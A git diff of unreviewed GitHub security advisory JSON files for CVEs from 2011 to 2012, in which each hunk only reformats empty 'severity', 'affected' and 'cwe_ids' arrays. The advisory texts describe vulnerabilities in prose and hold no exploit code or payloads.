a/advisories/unreviewed/2022/05/GHSA-wqgf-h892-f3cp/GHSA-wqgf-h892-f3cp.json b/advisories/unreviewed/2022/05/GHSA-wqgf-h892-f3cp/GHSA-wqgf-h892-f3cp.json index 69c4786c7ae..d7599d81de5 100644 --- a/advisories/unreviewed/2022/05/GHSA-wqgf-h892-f3cp/GHSA-wqgf-h892-f3cp.json +++ b/advisories/unreviewed/2022/05/GHSA-wqgf-h892-f3cp/GHSA-wqgf-h892-f3cp.json @@ -7,12 +7,8 @@ "CVE-2012-2118" ], "details": "Format string vulnerability in the LogVHdrMessageVerb function in os/log.c in X.Org X11 1.11 allows attackers to cause a denial of service or possibly execute arbitrary code via format string specifiers in an input device name.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wqv4-fgcf-pxph/GHSA-wqv4-fgcf-pxph.json b/advisories/unreviewed/2022/05/GHSA-wqv4-fgcf-pxph/GHSA-wqv4-fgcf-pxph.json index 01c9f9967ae..6eae0376b79 100644 --- a/advisories/unreviewed/2022/05/GHSA-wqv4-fgcf-pxph/GHSA-wqv4-fgcf-pxph.json +++ b/advisories/unreviewed/2022/05/GHSA-wqv4-fgcf-pxph/GHSA-wqv4-fgcf-pxph.json @@ -7,12 +7,8 @@ "CVE-2012-4018" ], "details": "Cross-site scripting (XSS) vulnerability in Final Beta Laboratory MyWebSearch before 1.23 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wqw4-vgcc-rj7q/GHSA-wqw4-vgcc-rj7q.json b/advisories/unreviewed/2022/05/GHSA-wqw4-vgcc-rj7q/GHSA-wqw4-vgcc-rj7q.json index 4d2e73ab7d0..ffe96a8fbb3 100644 --- a/advisories/unreviewed/2022/05/GHSA-wqw4-vgcc-rj7q/GHSA-wqw4-vgcc-rj7q.json +++ b/advisories/unreviewed/2022/05/GHSA-wqw4-vgcc-rj7q/GHSA-wqw4-vgcc-rj7q.json @@ -7,12 +7,8 @@ "CVE-2012-1742" ], "details": "Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect availability via unknown vectors related to UI Framework, a different vulnerability than CVE-2012-1760.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-ww3h-3jmp-39vx/GHSA-ww3h-3jmp-39vx.json b/advisories/unreviewed/2022/05/GHSA-ww3h-3jmp-39vx/GHSA-ww3h-3jmp-39vx.json index d76c6e07860..d203ab39b19 100644 --- a/advisories/unreviewed/2022/05/GHSA-ww3h-3jmp-39vx/GHSA-ww3h-3jmp-39vx.json +++ b/advisories/unreviewed/2022/05/GHSA-ww3h-3jmp-39vx/GHSA-ww3h-3jmp-39vx.json @@ -7,12 +7,8 @@ "CVE-2012-0731" ], "details": "IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 does not prevent service-account impersonation, which allows remote authenticated users to read arbitrary files via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wwcg-g326-fh6q/GHSA-wwcg-g326-fh6q.json b/advisories/unreviewed/2022/05/GHSA-wwcg-g326-fh6q/GHSA-wwcg-g326-fh6q.json index b6932768e59..ce963651907 100644 --- a/advisories/unreviewed/2022/05/GHSA-wwcg-g326-fh6q/GHSA-wwcg-g326-fh6q.json +++ b/advisories/unreviewed/2022/05/GHSA-wwcg-g326-fh6q/GHSA-wwcg-g326-fh6q.json @@ -7,12 +7,8 @@ "CVE-2012-3323" ], "details": "IBM Maximo Asset Management 6.2 before 6.2.8, 7.1 before 7.1.1.12, and 7.5 before 7.5.0.3 allows remote attackers to gain privileges via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wwrw-xchg-gfw3/GHSA-wwrw-xchg-gfw3.json b/advisories/unreviewed/2022/05/GHSA-wwrw-xchg-gfw3/GHSA-wwrw-xchg-gfw3.json index f00ea39f814..841dc8fc019 100644 --- a/advisories/unreviewed/2022/05/GHSA-wwrw-xchg-gfw3/GHSA-wwrw-xchg-gfw3.json +++ b/advisories/unreviewed/2022/05/GHSA-wwrw-xchg-gfw3/GHSA-wwrw-xchg-gfw3.json @@ -7,12 +7,8 @@ "CVE-2012-4078" ], "details": "The Baseboard Management Controller (BMC) in Cisco Unified Computing System (UCS) does not properly handle SSH escape sequences, which allows remote authenticated users to bypass an unspecified authentication step via SSH port forwarding, aka Bug ID CSCtg17656.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-wx92-vpj8-mf44/GHSA-wx92-vpj8-mf44.json b/advisories/unreviewed/2022/05/GHSA-wx92-vpj8-mf44/GHSA-wx92-vpj8-mf44.json index 922ce2a55d1..201df134586 100644 --- a/advisories/unreviewed/2022/05/GHSA-wx92-vpj8-mf44/GHSA-wx92-vpj8-mf44.json +++ b/advisories/unreviewed/2022/05/GHSA-wx92-vpj8-mf44/GHSA-wx92-vpj8-mf44.json @@ -7,12 +7,8 @@ "CVE-2012-3564" ], "details": "Opera before 12.00 Beta allows remote attackers to cause a denial of service (application hang) via an absolutely positioned wrap=off TEXTAREA element located next to an \"overflow: auto\" block element.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wx9q-cmfr-g47j/GHSA-wx9q-cmfr-g47j.json b/advisories/unreviewed/2022/05/GHSA-wx9q-cmfr-g47j/GHSA-wx9q-cmfr-g47j.json index 6eade0291d1..97a0c66b8f1 100644 --- a/advisories/unreviewed/2022/05/GHSA-wx9q-cmfr-g47j/GHSA-wx9q-cmfr-g47j.json +++ b/advisories/unreviewed/2022/05/GHSA-wx9q-cmfr-g47j/GHSA-wx9q-cmfr-g47j.json @@ -7,12 +7,8 @@ "CVE-2012-1811" ], "details": "EOSDataServer.exe in C3-ilex EOScada before 11.0.19.2 allows remote attackers to cause a denial of service by sending a large amount of data to TCP port 24006.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-wxm5-m389-rfvx/GHSA-wxm5-m389-rfvx.json b/advisories/unreviewed/2022/05/GHSA-wxm5-m389-rfvx/GHSA-wxm5-m389-rfvx.json index d899a3573d2..a45004cca97 100644 --- a/advisories/unreviewed/2022/05/GHSA-wxm5-m389-rfvx/GHSA-wxm5-m389-rfvx.json +++ b/advisories/unreviewed/2022/05/GHSA-wxm5-m389-rfvx/GHSA-wxm5-m389-rfvx.json @@ -7,12 +7,8 @@ "CVE-2012-2066" ], "details": "Cross-site scripting (XSS) vulnerability in the FCKeditor module 6.x-2.x before 6.x-2.3 and the CKEditor module 6.x-1.x before 6.x-1.9 and 7.x-1.x before 7.x-1.7 for Drupal allows remote authenticated users or remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x22x-5jv5-w996/GHSA-x22x-5jv5-w996.json b/advisories/unreviewed/2022/05/GHSA-x22x-5jv5-w996/GHSA-x22x-5jv5-w996.json index 2b80b73dd4a..7b4abb0041a 100644 --- a/advisories/unreviewed/2022/05/GHSA-x22x-5jv5-w996/GHSA-x22x-5jv5-w996.json +++ b/advisories/unreviewed/2022/05/GHSA-x22x-5jv5-w996/GHSA-x22x-5jv5-w996.json @@ -7,12 +7,8 @@ "CVE-2011-5148" ], "details": "Multiple incomplete blacklist vulnerabilities in the Simple File Upload (mod_simplefileuploadv1.3) module before 1.3.5 for Joomla! allow remote attackers to execute arbitrary code by uploading a file with a (1) php5, (2) php6, or (3) double (e.g. .php.jpg) extension, then accessing it via a direct request to the file in images/, as exploited in the wild in January 2012.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x2fr-7m77-g32f/GHSA-x2fr-7m77-g32f.json b/advisories/unreviewed/2022/05/GHSA-x2fr-7m77-g32f/GHSA-x2fr-7m77-g32f.json index 4d68b3497e8..08f38e4ee1b 100644 --- a/advisories/unreviewed/2022/05/GHSA-x2fr-7m77-g32f/GHSA-x2fr-7m77-g32f.json +++ b/advisories/unreviewed/2022/05/GHSA-x2fr-7m77-g32f/GHSA-x2fr-7m77-g32f.json @@ -7,12 +7,8 @@ "CVE-2012-3310" ], "details": "IBM Tivoli Federated Identity Manager (TFIM) before 6.1.1.14, 6.2.0 before 6.2.0.12, and 6.2.1 before 6.2.1.4 allows context-dependent attackers to discover (1) a cleartext LDAP Bind Password, (2) keystore passwords, (3) a cleartext Basic Authentication password from a client, or (4) a cleartext user password by leveraging a logging configuration with a log trace setting of all.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x348-x493-xr7c/GHSA-x348-x493-xr7c.json b/advisories/unreviewed/2022/05/GHSA-x348-x493-xr7c/GHSA-x348-x493-xr7c.json index 2303283b4ce..908d7b95980 100644 --- a/advisories/unreviewed/2022/05/GHSA-x348-x493-xr7c/GHSA-x348-x493-xr7c.json +++ b/advisories/unreviewed/2022/05/GHSA-x348-x493-xr7c/GHSA-x348-x493-xr7c.json @@ -7,12 +7,8 @@ "CVE-2012-2918" ], "details": "Cross-site scripting (XSS) vulnerability in Upload/engine.php in Chevereto 1.91 allows remote attackers to inject arbitrary web script or HTML via the v parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x3fr-g2mw-frx8/GHSA-x3fr-g2mw-frx8.json b/advisories/unreviewed/2022/05/GHSA-x3fr-g2mw-frx8/GHSA-x3fr-g2mw-frx8.json index 7a24b00139f..5f75eae045e 100644 --- a/advisories/unreviewed/2022/05/GHSA-x3fr-g2mw-frx8/GHSA-x3fr-g2mw-frx8.json +++ b/advisories/unreviewed/2022/05/GHSA-x3fr-g2mw-frx8/GHSA-x3fr-g2mw-frx8.json @@ -7,12 +7,8 @@ "CVE-2012-3833" ], "details": "Cross-site scripting (XSS) vulnerability in the default index page in admin/ in Quick.CMS 4.0 allows remote attackers to inject arbitrary web script or HTML via the p parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x3pq-rg68-hrcp/GHSA-x3pq-rg68-hrcp.json b/advisories/unreviewed/2022/05/GHSA-x3pq-rg68-hrcp/GHSA-x3pq-rg68-hrcp.json index 08eac3bfdd1..b0ec6a02b28 100644 --- a/advisories/unreviewed/2022/05/GHSA-x3pq-rg68-hrcp/GHSA-x3pq-rg68-hrcp.json +++ b/advisories/unreviewed/2022/05/GHSA-x3pq-rg68-hrcp/GHSA-x3pq-rg68-hrcp.json @@ -7,12 +7,8 @@ "CVE-2012-0900" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Beehive Forum 1.0.1 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) forum/register.php or (2) forum/logon.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x4cj-m7cx-w8jr/GHSA-x4cj-m7cx-w8jr.json b/advisories/unreviewed/2022/05/GHSA-x4cj-m7cx-w8jr/GHSA-x4cj-m7cx-w8jr.json index fd7038e2a22..1687e64a345 100644 --- a/advisories/unreviewed/2022/05/GHSA-x4cj-m7cx-w8jr/GHSA-x4cj-m7cx-w8jr.json +++ b/advisories/unreviewed/2022/05/GHSA-x4cj-m7cx-w8jr/GHSA-x4cj-m7cx-w8jr.json @@ -7,12 +7,8 @@ "CVE-2012-3578" ], "details": "Unrestricted file upload vulnerability in html/Upload.php in the FCChat Widget plugin 2.2.13.1 and earlier for WordPress allows remote attackers to execute arbitrary code by uploading a file with a file with an executable extension followed by a safe extension, then accessing it via a direct request to the file in html/images.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x56w-jmgw-h963/GHSA-x56w-jmgw-h963.json b/advisories/unreviewed/2022/05/GHSA-x56w-jmgw-h963/GHSA-x56w-jmgw-h963.json index f82dc74c0b7..5bde619203d 100644 --- a/advisories/unreviewed/2022/05/GHSA-x56w-jmgw-h963/GHSA-x56w-jmgw-h963.json +++ b/advisories/unreviewed/2022/05/GHSA-x56w-jmgw-h963/GHSA-x56w-jmgw-h963.json @@ -7,12 +7,8 @@ "CVE-2012-2277" ], "details": "The IRM Server in EMC Documentum Information Rights Management 4.x before 4.7.0100 and 5.x before 5.0.1030 allows remote attackers to cause a denial of service (pvcontrol.exe process hang) via \\n (line feed) characters in the Id fields of many \"batch begin untethered\" commands.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x588-2pxr-8rpq/GHSA-x588-2pxr-8rpq.json b/advisories/unreviewed/2022/05/GHSA-x588-2pxr-8rpq/GHSA-x588-2pxr-8rpq.json index c25d1642ebb..21aa25eab60 100644 --- a/advisories/unreviewed/2022/05/GHSA-x588-2pxr-8rpq/GHSA-x588-2pxr-8rpq.json +++ b/advisories/unreviewed/2022/05/GHSA-x588-2pxr-8rpq/GHSA-x588-2pxr-8rpq.json @@ -7,12 +7,8 @@ "CVE-2011-5173" ], "details": "Buffer overflow in Bugbear Entertainment FlatOut 2005 allows user-assisted remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long string in the title field in a bed file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x687-p66q-w3j2/GHSA-x687-p66q-w3j2.json b/advisories/unreviewed/2022/05/GHSA-x687-p66q-w3j2/GHSA-x687-p66q-w3j2.json index 05b26ec6621..193ff331c25 100644 --- a/advisories/unreviewed/2022/05/GHSA-x687-p66q-w3j2/GHSA-x687-p66q-w3j2.json +++ b/advisories/unreviewed/2022/05/GHSA-x687-p66q-w3j2/GHSA-x687-p66q-w3j2.json @@ -7,12 +7,8 @@ "CVE-2012-1456" ], "details": "The TAR file parser in AVG Anti-Virus 10.0.0.1190, Quick Heal (aka Cat QuickHeal) 11.00, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, Panda Antivirus 10.0.2.7, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a TAR file with an appended ZIP file. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -68,9 +64,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x6r5-6r34-p24j/GHSA-x6r5-6r34-p24j.json b/advisories/unreviewed/2022/05/GHSA-x6r5-6r34-p24j/GHSA-x6r5-6r34-p24j.json index a77b1b91752..7849f28f22c 100644 --- a/advisories/unreviewed/2022/05/GHSA-x6r5-6r34-p24j/GHSA-x6r5-6r34-p24j.json +++ b/advisories/unreviewed/2022/05/GHSA-x6r5-6r34-p24j/GHSA-x6r5-6r34-p24j.json @@ -7,12 +7,8 @@ "CVE-2012-3305" ], "details": "Directory traversal vulnerability in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.25, 8.0 before 8.0.0.5, and 8.5 before 8.5.0.1 allows remote attackers to overwrite arbitrary files via a crafted application file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x6v7-57rh-8p7h/GHSA-x6v7-57rh-8p7h.json b/advisories/unreviewed/2022/05/GHSA-x6v7-57rh-8p7h/GHSA-x6v7-57rh-8p7h.json index 7805721340c..ae073184c56 100644 --- a/advisories/unreviewed/2022/05/GHSA-x6v7-57rh-8p7h/GHSA-x6v7-57rh-8p7h.json +++ b/advisories/unreviewed/2022/05/GHSA-x6v7-57rh-8p7h/GHSA-x6v7-57rh-8p7h.json @@ -7,12 +7,8 @@ "CVE-2012-1023" ], "details": "Open redirect vulnerability in admin/index.php in 4images 1.7.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x74m-v27f-v796/GHSA-x74m-v27f-v796.json b/advisories/unreviewed/2022/05/GHSA-x74m-v27f-v796/GHSA-x74m-v27f-v796.json index 3d8218e247e..4692f59b83a 100644 --- a/advisories/unreviewed/2022/05/GHSA-x74m-v27f-v796/GHSA-x74m-v27f-v796.json +++ b/advisories/unreviewed/2022/05/GHSA-x74m-v27f-v796/GHSA-x74m-v27f-v796.json @@ -7,12 +7,8 @@ "CVE-2012-3300" ], "details": "IBM WebSphere Commerce 7.0 before 7.0.0.6, when persistent sessions and personalization IDs are enabled, allows remote attackers to cause a denial of service (resource consumption) via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x8cv-g59m-9p6q/GHSA-x8cv-g59m-9p6q.json b/advisories/unreviewed/2022/05/GHSA-x8cv-g59m-9p6q/GHSA-x8cv-g59m-9p6q.json index a0505f8f473..bca2013d246 100644 --- a/advisories/unreviewed/2022/05/GHSA-x8cv-g59m-9p6q/GHSA-x8cv-g59m-9p6q.json +++ b/advisories/unreviewed/2022/05/GHSA-x8cv-g59m-9p6q/GHSA-x8cv-g59m-9p6q.json @@ -7,12 +7,8 @@ "CVE-2012-3504" ], "details": "The nssconfigFound function in genkey.pl in crypto-utils 2.4.1-34 allows local users to overwrite arbitrary files via a symlink attack on the \"list\" file in the current working directory.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x8q6-f6xw-83vw/GHSA-x8q6-f6xw-83vw.json b/advisories/unreviewed/2022/05/GHSA-x8q6-f6xw-83vw/GHSA-x8q6-f6xw-83vw.json index a7a0c64fd14..cd7eeca699b 100644 --- a/advisories/unreviewed/2022/05/GHSA-x8q6-f6xw-83vw/GHSA-x8q6-f6xw-83vw.json +++ b/advisories/unreviewed/2022/05/GHSA-x8q6-f6xw-83vw/GHSA-x8q6-f6xw-83vw.json @@ -7,12 +7,8 @@ "CVE-2012-3574" ], "details": "Unrestricted file upload vulnerability in includes/doajaxfileupload.php in the MM Forms Community plugin 2.2.5 and 2.2.6 for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in upload/temp.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x8wg-7whp-9v2j/GHSA-x8wg-7whp-9v2j.json b/advisories/unreviewed/2022/05/GHSA-x8wg-7whp-9v2j/GHSA-x8wg-7whp-9v2j.json index 67594035687..a75bc2d5cad 100644 --- a/advisories/unreviewed/2022/05/GHSA-x8wg-7whp-9v2j/GHSA-x8wg-7whp-9v2j.json +++ b/advisories/unreviewed/2022/05/GHSA-x8wg-7whp-9v2j/GHSA-x8wg-7whp-9v2j.json @@ -7,12 +7,8 @@ "CVE-2012-1783" ], "details": "Tiny Server 1.1.9 and earlier allows remote attackers to cause a denial of service (crash) via a long string in a GET request without an HTTP version number.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x98r-27wr-8583/GHSA-x98r-27wr-8583.json b/advisories/unreviewed/2022/05/GHSA-x98r-27wr-8583/GHSA-x98r-27wr-8583.json index 5a5a50b6605..1e6c452c02b 100644 --- a/advisories/unreviewed/2022/05/GHSA-x98r-27wr-8583/GHSA-x98r-27wr-8583.json +++ b/advisories/unreviewed/2022/05/GHSA-x98r-27wr-8583/GHSA-x98r-27wr-8583.json @@ -7,12 +7,8 @@ "CVE-2012-3727" ], "details": "Buffer overflow in the IPsec component in Apple iOS before 6 allows remote attackers to execute arbitrary code via a crafted racoon configuration file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x9fq-wqqx-7x9w/GHSA-x9fq-wqqx-7x9w.json b/advisories/unreviewed/2022/05/GHSA-x9fq-wqqx-7x9w/GHSA-x9fq-wqqx-7x9w.json index 79edfa0833d..434b6814cb5 100644 --- a/advisories/unreviewed/2022/05/GHSA-x9fq-wqqx-7x9w/GHSA-x9fq-wqqx-7x9w.json +++ b/advisories/unreviewed/2022/05/GHSA-x9fq-wqqx-7x9w/GHSA-x9fq-wqqx-7x9w.json @@ -7,12 +7,8 @@ "CVE-2011-4848" ], "details": "The Control Panel in Parallels Plesk Panel 10.4.4_build20111103.18 includes a submitted password within an HTTP response body, which allows remote attackers to obtain sensitive information by sniffing the network, as demonstrated by password handling in certain files under client@1/domain@1/backup/local-repository/.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xc6c-mh6c-56hr/GHSA-xc6c-mh6c-56hr.json b/advisories/unreviewed/2022/05/GHSA-xc6c-mh6c-56hr/GHSA-xc6c-mh6c-56hr.json index b8a5f7d6c9e..11710f04dd7 100644 --- a/advisories/unreviewed/2022/05/GHSA-xc6c-mh6c-56hr/GHSA-xc6c-mh6c-56hr.json +++ b/advisories/unreviewed/2022/05/GHSA-xc6c-mh6c-56hr/GHSA-xc6c-mh6c-56hr.json @@ -7,12 +7,8 @@ "CVE-2012-2572" ], "details": "Cross-site scripting (XSS) vulnerability in the ThreeWP Email Reflector plugin before 1.16 for WordPress allows remote attackers to inject arbitrary web script or HTML via the Subject of an email.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xcc2-6x6r-c739/GHSA-xcc2-6x6r-c739.json b/advisories/unreviewed/2022/05/GHSA-xcc2-6x6r-c739/GHSA-xcc2-6x6r-c739.json index 76663b89d10..2cee29194e0 100644 --- a/advisories/unreviewed/2022/05/GHSA-xcc2-6x6r-c739/GHSA-xcc2-6x6r-c739.json +++ b/advisories/unreviewed/2022/05/GHSA-xcc2-6x6r-c739/GHSA-xcc2-6x6r-c739.json @@ -7,12 +7,8 @@ "CVE-2012-2297" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in the Creative Commons module 6.x-1.x before 6.x-1.1 for Drupal allow remote authenticated users with the administer creative commons permission to inject arbitrary web script or HTML via the (1) creativecommons_user_message or (2) creativecommons_site_license_additional_text parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xcj2-pgvr-f289/GHSA-xcj2-pgvr-f289.json b/advisories/unreviewed/2022/05/GHSA-xcj2-pgvr-f289/GHSA-xcj2-pgvr-f289.json index 36cf8f298cd..a076bc3c033 100644 --- a/advisories/unreviewed/2022/05/GHSA-xcj2-pgvr-f289/GHSA-xcj2-pgvr-f289.json +++ b/advisories/unreviewed/2022/05/GHSA-xcj2-pgvr-f289/GHSA-xcj2-pgvr-f289.json @@ -7,12 +7,8 @@ "CVE-2012-2082" ], "details": "Cross-site scripting (XSS) vulnerability in the Chaos tool suite (aka CTools) module 7.x-1.x before 7.x-1.0 for Drupal allows remote authenticated users with the post comments permission to inject arbitrary web script or HTML via a user signature.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xcv6-f3m2-4vmf/GHSA-xcv6-f3m2-4vmf.json b/advisories/unreviewed/2022/05/GHSA-xcv6-f3m2-4vmf/GHSA-xcv6-f3m2-4vmf.json index b015192c356..ffebff40fa2 100644 --- a/advisories/unreviewed/2022/05/GHSA-xcv6-f3m2-4vmf/GHSA-xcv6-f3m2-4vmf.json +++ b/advisories/unreviewed/2022/05/GHSA-xcv6-f3m2-4vmf/GHSA-xcv6-f3m2-4vmf.json @@ -7,12 +7,8 @@ "CVE-2012-3726" ], "details": "Double free vulnerability in ImageIO in Apple iOS before 6 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted JPEG image.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-xcvf-58hp-27qh/GHSA-xcvf-58hp-27qh.json b/advisories/unreviewed/2022/05/GHSA-xcvf-58hp-27qh/GHSA-xcvf-58hp-27qh.json index 9cf59ba3745..fc825b13ba6 100644 --- a/advisories/unreviewed/2022/05/GHSA-xcvf-58hp-27qh/GHSA-xcvf-58hp-27qh.json +++ b/advisories/unreviewed/2022/05/GHSA-xcvf-58hp-27qh/GHSA-xcvf-58hp-27qh.json @@ -7,12 +7,8 @@ "CVE-2012-1196" ], "details": "Directory traversal vulnerability in the VulCore web service (WSVulnerabilityCore/VulCore.asmx) in Lenovo ThinkManagement Console 9.0.3 allows remote attackers to delete arbitrary files via a .. (dot dot) in the filename parameter in a SetTaskLogByFile SOAP request.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xcwh-7pvx-hhg4/GHSA-xcwh-7pvx-hhg4.json b/advisories/unreviewed/2022/05/GHSA-xcwh-7pvx-hhg4/GHSA-xcwh-7pvx-hhg4.json index 1b723e6f63e..fe283fc76a7 100644 --- a/advisories/unreviewed/2022/05/GHSA-xcwh-7pvx-hhg4/GHSA-xcwh-7pvx-hhg4.json +++ b/advisories/unreviewed/2022/05/GHSA-xcwh-7pvx-hhg4/GHSA-xcwh-7pvx-hhg4.json @@ -7,12 +7,8 @@ "CVE-2012-0932" ], "details": "Cross-site scripting (XSS) vulnerability in admin/login.php in Lead Capture Page System allows remote attackers to inject arbitrary web script or HTML via the message parameter.", - "severity": [ - - ], - 